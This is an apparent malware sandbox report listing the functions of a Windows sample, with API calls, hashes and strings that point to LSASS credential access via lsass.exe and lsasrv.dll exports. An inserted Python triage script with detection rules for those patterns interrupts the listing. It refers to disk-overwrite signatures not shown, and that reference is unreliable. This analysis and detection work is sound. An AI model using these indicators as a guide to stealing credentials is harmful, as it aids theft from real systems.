                                                • Instruction Fuzzy Hash: 06318531A08A4682EB10AF24E814779B3B0FB45B64FD44239DAAD077D4EF7CD5458B61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • CreateFileW.KERNEL32 ref: 00007FF72E9032FF
                                                • RtlInitUnicodeString.NTDLL ref: 00007FF72E90332E
                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,?,00007FF72E9025E9,00007FF72E90369A), ref: 00007FF72E903373
                                                • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,?,00007FF72E9025E9,00007FF72E90369A), ref: 00007FF72E90338A
                                                • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,?,00007FF72E9025E9,00007FF72E90369A), ref: 00007FF72E903591
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,?,00007FF72E9025E9,00007FF72E90369A), ref: 00007FF72E90359F
                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,?,00007FF72E9025E9,00007FF72E90369A), ref: 00007FF72E9035A9
                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,?,00007FF72E9025E9,00007FF72E90369A), ref: 00007FF72E9035B2
                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00000001,?,00007FF72E9025E9,00007FF72E90369A), ref: 00007FF72E9035C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: FreeLocal$CloseFile$ChangeCreateFindHandleInitNotificationOpenProcessStringUnicodeUnmapView
                                                • String ID: lsass.exe
                                                • API String ID: 34978191-3024872867
                                                • Opcode ID: f26b98aaa51834c4da608bd926982403fc55e1899fdd91af25bb406dcc5f2fcf
                                                • Instruction ID: 6a054f3080bb834b2768fa924c315a4c82d253b5cc02d6a966f0e67625d8da5a
                                                • Opcode Fuzzy Hash: f26b98aaa51834c4da608bd926982403fc55e1899fdd91af25bb406dcc5f2fcf
                                                • Instruction Fuzzy Hash: 7FA14671A09A028AFB14EF15EC4057CB3A0FF84B94FC4513BD98D5BAA4DF3DA5458B22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                 • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc$FreeLocal$FilePointer$ControlDeviceMemoryProcessWrite
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 1566430793-3502785670
                                                • Opcode ID: 77b3b3077083457f454160817387a736409e1daf99480078890e869b7eff82a6
                                                • Instruction ID: 34c55d1ae938fcc432478311a17e024011f7375bf6add4cb6c4abc03b3cdc1d1
                                                • Opcode Fuzzy Hash: 77b3b3077083457f454160817387a736409e1daf99480078890e869b7eff82a6
                                                • Instruction Fuzzy Hash: 99413176B04B06DAEB50EF61E8441AC7374FB44B48BC4443ACA4D43B59EF38E659CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                 • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: _amsg_exit$CommandInitializeLine__wsetargv_cinit
                                                • String ID:
                                                • API String ID: 2949660345-0
                                                • Opcode ID: 2363d71b0307cd564027734d8d415752cf8de78fb711bb724591f5801a928425
                                                • Instruction ID: ff5948ed0288c3e0da74b0c6d2a761fecf36c14570ff041dad2e4b53b31a229c
                                                • Opcode Fuzzy Hash: 2363d71b0307cd564027734d8d415752cf8de78fb711bb724591f5801a928425
                                                • Instruction Fuzzy Hash: E931E820E0865386FB64BB65EC552BDA295EF42344FC0443FD6DD862D3DE2CA9808E73
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                 • Graph summary (the rendered graph is not recoverable from the page; recovered from its exported block list): function 7ff72e906734-7ff72e906a05 with a subcall to 7ff72e9075a0. Its basic blocks call GetStartupInfoW, GetStdHandle, GetFileType, SetHandleCount and InitializeCriticalSectionAndSpinCount, the standard-handle initialisation of the Microsoft C runtime rather than sample-specific logic.
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                 • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
                                                • String ID:
                                                • API String ID: 3473179607-0
                                                • Opcode ID: b91d4d52e98355c8f1f8211771a9aa0a60105c8cd0f9cf77b976f6f64b7dcd0b
                                                • Instruction ID: 8c891559ac899263c4d2cd2c9ef846adc345af5b5f777a00ef2bf26fef753d8b
                                                • Opcode Fuzzy Hash: b91d4d52e98355c8f1f8211771a9aa0a60105c8cd0f9cf77b976f6f64b7dcd0b
                                                • Instruction Fuzzy Hash: A5819031A0978285EB54EF14D944369A6A0FB447B4FD4433ECABE06AD1EF3CE455CB22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                 • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: Local$AddressAllocFreeHandleModuleProc
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 3402345641-3502785670
                                                • Opcode ID: 825a19b07b84a507a4d5b7b5605b7bf3c615a8c00f9681e35ec37bf58e192535
                                                • Instruction ID: b3e54aa3dfb830e43f8745a6447a4b65cd40ba03428f39b04d9a1145c9d574a2
                                                • Opcode Fuzzy Hash: 825a19b07b84a507a4d5b7b5605b7bf3c615a8c00f9681e35ec37bf58e192535
                                                • Instruction Fuzzy Hash: EC517032B14A4689EB10DF66EC506AC73B4FB48B98BC8403ADE8D57B54DF38D441CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • _lock.LIBCMT ref: 00007FF72E905A85
                                                  • Part of subcall function 00007FF72E90749C: _amsg_exit.LIBCMT ref: 00007FF72E9074C6
                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF72E905C49,?,?,00000000,00007FF72E9074CB), ref: 00007FF72E905AB8
                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF72E905C49,?,?,00000000,00007FF72E9074CB), ref: 00007FF72E905AD6
                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF72E905C49,?,?,00000000,00007FF72E9074CB), ref: 00007FF72E905B16
                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF72E905C49,?,?,00000000,00007FF72E9074CB), ref: 00007FF72E905B30
                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF72E905C49,?,?,00000000,00007FF72E9074CB), ref: 00007FF72E905B40
                                                • ExitProcess.KERNEL32 ref: 00007FF72E905BCC
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                 • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: DecodePointer$ExitProcess_amsg_exit_lock
                                                • String ID:
                                                • API String ID: 3411037476-0
                                                • Opcode ID: d5a1111323d63d3ab070b5611baeabd23b8252cef294cc46292b54eb86873553
                                                • Instruction ID: 41e359a522b1ae8ba25b41c80f78c1d2c3f53e81ae745c04195f81fc689c4b26
                                                • Opcode Fuzzy Hash: d5a1111323d63d3ab070b5611baeabd23b8252cef294cc46292b54eb86873553
                                                • Instruction Fuzzy Hash: 13415A31A1DA0285EB60BB12EC40239E294FF88794FC0043EDACD467A5DF7DE4558B62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                 • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AllocateHeap_callnewh_errno
                                                • String ID:
                                                • API String ID: 638267422-0
                                                • Opcode ID: d4b0a0cddf9340da4178819d750a398d4bc5387aadb62519f9694761d6e85c4a
                                                • Instruction ID: f19f5d64abcab9037d6e4f75658326ebcb58ca17dd71924a4103e5c5842da8ec
                                                • Opcode Fuzzy Hash: d4b0a0cddf9340da4178819d750a398d4bc5387aadb62519f9694761d6e85c4a
                                                • Instruction Fuzzy Hash: 5911A961B09202C5FF656B21DE44379E2A1DF947D0FC8463ACE5D476C4DE7C95808A62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                 • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: DescriptorHandleHeapSecurity$AddressAdjustAllocCloseCreateDaclFileInitializeModuleNumbersPrivilegeProcProcessSleepVersion
                                                • String ID:
                                                • API String ID: 366963940-0
                                                • Opcode ID: ab0f27c1ac3c09a6cd72c127b3178ba9f34a204990932a602f660392d8694354
                                                • Instruction ID: dd08b10de7664bba7e865d13397c38e3f876bd3e518d2d4b21c29dc845e6fefe
                                                • Opcode Fuzzy Hash: ab0f27c1ac3c09a6cd72c127b3178ba9f34a204990932a602f660392d8694354
                                                • Instruction Fuzzy Hash: B3114631A09A0795EB10AB10EC581B9B360FF40728FC0023BD5AD866A1DF7DE248CF62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                 • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: Heap$CreateInformationVersion
                                                • String ID:
                                                • API String ID: 3563531100-0
                                                • Opcode ID: bc8963bedb4d6625ef62e5a19f6952fdb0d1d82dbc8686983af6f38e3a97b8b6
                                                • Instruction ID: 84a0a3b84259957866b210e658c217f96809545079a24a636dc444346cca034d
                                                • Opcode Fuzzy Hash: bc8963bedb4d6625ef62e5a19f6952fdb0d1d82dbc8686983af6f38e3a97b8b6
                                                • Instruction Fuzzy Hash: 16E0ED30A18A4282FF84BB15EC08735A260FF98340FC0443EE88E02794DF7CA0458E22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                 • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: EnvironmentStrings$Free
                                                • String ID:
                                                • API String ID: 3328510275-0
                                                • Opcode ID: c88ab88cde072da99d442b396e127fe24ba6e3caff571b87e746a65db5771d56
                                                • Instruction ID: 5425b9c4016ecd63667d2110f7ef02d0894a22a1be9523659c346f91cc9ceead
                                                • Opcode Fuzzy Hash: c88ab88cde072da99d442b396e127fe24ba6e3caff571b87e746a65db5771d56
                                                • Instruction Fuzzy Hash: A8018451E0975185EE517B56E841039A2A0EF48BD0BC8403ADE8E07B85EF2CE4818B51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • malloc.LIBCMT ref: 00007FF72E90754B
                                                  • Part of subcall function 00007FF72E908D54: _FF_MSGBANNER.LIBCMT ref: 00007FF72E908D84
                                                  • Part of subcall function 00007FF72E908D54: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF72E907550,?,?,?,00007FF72E907415,?,?,?,00007FF72E9074BF), ref: 00007FF72E908DA9
                                                  • Part of subcall function 00007FF72E908D54: _callnewh.LIBCMT ref: 00007FF72E908DC2
                                                  • Part of subcall function 00007FF72E908D54: _errno.LIBCMT ref: 00007FF72E908DCD
                                                  • Part of subcall function 00007FF72E908D54: _errno.LIBCMT ref: 00007FF72E908DD8
                                                • Sleep.KERNEL32(?,?,?,00007FF72E907415,?,?,?,00007FF72E9074BF), ref: 00007FF72E90755E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                 • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: _errno$AllocateHeapSleep_callnewhmalloc
                                                • String ID:
                                                • API String ID: 3606348469-0
                                                • Opcode ID: cabcdb51b3bd1ac8b42cf06bf0904e8802bac5ce071706a98b2f21ac3ce61c0d
                                                • Instruction ID: f0eaad7d1373c46f374fba4181fbd8792f2e653747f2c1a62fcbe0a6d9db3e3f
                                                • Opcode Fuzzy Hash: cabcdb51b3bd1ac8b42cf06bf0904e8802bac5ce071706a98b2f21ac3ce61c0d
                                                • Instruction Fuzzy Hash: 1201DB3261478586E650BF06D80005DB3A1FB88F90FD81139EE8D17751DF39F881CB85
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNEL32(?,?,?,00007FF72E9052AB,?,?,00000002,00007FF72E905819,?,?,?,?,00007FF72E90436D), ref: 00007FF72E9075E5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                 • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: Sleep_errno
                                                • String ID:
                                                • API String ID: 1068366078-0
                                                • Opcode ID: c0b535ad7735b5aaa1a7a144473e21ad36ee7b4f65930020565906d9da4b0b58
                                                • Instruction ID: 788ae677032f08eacf92943f0227e0a4ed28414a4ab19bb91df177161bf20fe5
                                                • Opcode Fuzzy Hash: c0b535ad7735b5aaa1a7a144473e21ad36ee7b4f65930020565906d9da4b0b58
                                                • Instruction Fuzzy Hash: F301A732A14B4585EA54AF16D80002DF6A2F788FD0B89113AEE9E07755CF3DE851CF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                 • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressProc$HandleModule$InitStringUnicode
                                                • String ID: LoadLibraryW$LocalAlloc$LsaICancelNotification$LsaIRegisterNotification$kernel32$lsasrv$lsasrv.dll
                                                • API String ID: 3738668-4050322347
                                                • Opcode ID: 3de30d6e50a47cc1e8fa4c930ac3fbed2600160da6681a3b173b9f4a7a194a84
                                                • Instruction ID: 9c7bac86f80bed4d66a40a961cd1ce31db0607b27a3e87091c47a1720e7466ff
                                                • Opcode Fuzzy Hash: 3de30d6e50a47cc1e8fa4c930ac3fbed2600160da6681a3b173b9f4a7a194a84
                                                • Instruction Fuzzy Hash: B5711B36A09B0799EB40EF55EC905B8B3A4EB44784FC4403BCA8D57724EE3CE559CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%
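Two of the function entries above are the ones worth a triage analyst's attention: the function whose String ID is lsass.exe and whose API set includes OpenProcess, and the function that resolves LsaIRegisterNotification and LsaICancelNotification from lsasrv.dll by name. The following script is an added example, not part of the Joe Sandbox report and not code from the sample: it parses the "Similarity" entries in the shape printed on this page and flags those two credential-access patterns. The sample text inside it is constructed from the values shown above, the triage rules are hypothetical, and the assumption that each `$`-separated group in the API ID field is a concatenation of CamelCase fragments of API names (for instance `AddressProc` for GetProcAddress) is the script's own. Whether this sample actually injects code into LSASS is not established by the listing alone; the rules only flag the combination of indicators the report shows.

```python
import re
from dataclasses import dataclass, field

# Constructed sample, NOT a file produced by Joe Sandbox: three "Similarity"
# entries in the shape the IDA plugin prints them. The first two carry the
# lsass.exe and lsasrv.dll indicators shown in this report; the third is an
# ordinary CRT start-up function used as a negative control.
SAMPLE_REPORT = """\
Similarity
• API ID: FreeLocal$CloseFile$ChangeCreateFindHandleInitNotificationOpenProcessStringUnicodeUnmapView
• String ID: lsass.exe
• API String ID: 34978191-3024872867
Uniqueness
Similarity
• API ID: AddressProc$HandleModule$InitStringUnicode
• String ID: LoadLibraryW$LocalAlloc$LsaICancelNotification$LsaIRegisterNotification$kernel32$lsasrv$lsasrv.dll
• API String ID: 3738668-4050322347
Uniqueness
Similarity
• API ID: _amsg_exit$CommandInitializeLine__wsetargv_cinit
• String ID:
• API String ID: 2949660345-0
Uniqueness
"""


@dataclass
class FunctionEntry:
    api_string_id: str = ""
    api_words: set = field(default_factory=set)
    strings: set = field(default_factory=set)


def parse_entries(report_text):
    """Collect the API-name fragments and referenced strings of every
    'Similarity' entry. ASSUMPTION: each '$'-separated group in 'API ID' is a
    concatenation of CamelCase fragments of API names (e.g. 'AddressProc' for
    GetProcAddress), so splitting on capital letters recovers the fragments."""
    entries = []
    current = None
    for raw in report_text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "Similarity":
            current = FunctionEntry()
            entries.append(current)
        elif current is None:
            continue
        elif line.startswith("API ID:"):
            for group in line[len("API ID:"):].split("$"):
                current.api_words.update(re.findall(r"[A-Z][a-z]+", group))
        elif line.startswith("String ID:"):
            value = line[len("String ID:"):].strip()
            current.strings.update(s for s in value.split("$") if s)
        elif line.startswith("API String ID:"):
            current.api_string_id = line[len("API String ID:"):].strip()
    return entries


# Hypothetical triage rules written for this example: (name, API-name
# fragments that must all be present, strings of which at least one must be
# present, explanation). Each rule needs the API *and* the string, so a
# function that merely contains the text lsass.exe is not flagged on its own.
RULES = (
    ("lsass_open", {"Open", "Process"}, {"lsass.exe"},
     "OpenProcess together with the string lsass.exe: a handle to LSASS is "
     "being requested, the first step of credential dumping"),
    ("lsasrv_notification", {"Address", "Proc"},
     {"LsaIRegisterNotification", "LsaICancelNotification"},
     "GetProcAddress used to resolve LsaIRegisterNotification or "
     "LsaICancelNotification from lsasrv.dll: these undocumented exports are "
     "of little use outside the LSASS process, so resolving them points to "
     "code meant to run there"),
)


def triage(entries):
    """Return [(api_string_id, [matched rule names])] for flagged entries only."""
    flagged = []
    for entry in entries:
        matched = [name for name, words, strings, _ in RULES
                   if words <= entry.api_words and entry.strings & strings]
        if matched:
            flagged.append((entry.api_string_id, matched))
    return flagged


if __name__ == "__main__":
    for api_string_id, matched in triage(parse_entries(SAMPLE_REPORT)):
        explanations = [desc for name, _, _, desc in RULES if name in matched]
        print(api_string_id, matched, explanations)
```

Run against a saved copy of the report's text, the same parser applies unchanged; only the rule table needs extending (for instance, a rule on `Write` plus `PhysicalDrive` strings for the disk-overwrite functions the signatures at the top of the report refer to).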

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                • API String ID: 2183313154-4022980321
                                                • Opcode ID: dcda75584b8517e25de290891c31400e0d26b97007449570066c954a9f79e6da
                                                • Instruction ID: 376a1609832a498efa8849d7e7584b71df66e2e58ec85185d31c43d99ecffaa9
                                                • Opcode Fuzzy Hash: dcda75584b8517e25de290891c31400e0d26b97007449570066c954a9f79e6da
                                                • Instruction Fuzzy Hash: C451BF31B1865282FB74B725EC156AAA295FF85784FC4013BEEDD42A85DF3CE5018A22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                • String ID:
                                                • API String ID: 3778485334-0
                                                • Opcode ID: 7be16279bd0ca890dda24cf68bf581e3bb9519a935480ce7e5e99a288567db6b
                                                • Instruction ID: 8ed063897fba5e3b3a60edd17a1af8095a2c24e497d41c1728be58d90ff95920
                                                • Opcode Fuzzy Hash: 7be16279bd0ca890dda24cf68bf581e3bb9519a935480ce7e5e99a288567db6b
                                                • Instruction Fuzzy Hash: 38310835A08B4689EA90AB15FC4436AB3A4FB48750FC0143BDACD57764DF7DE044CB22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: c10b66f4ad814e9fa5aeb7ac24dc57c405e661451348fa1c704a1c9b0a9cf0d4
                                                • Instruction ID: 54b144e32f8f34db677f83723dcfc1d5a8ba62754717e0740cb5a328497eb747
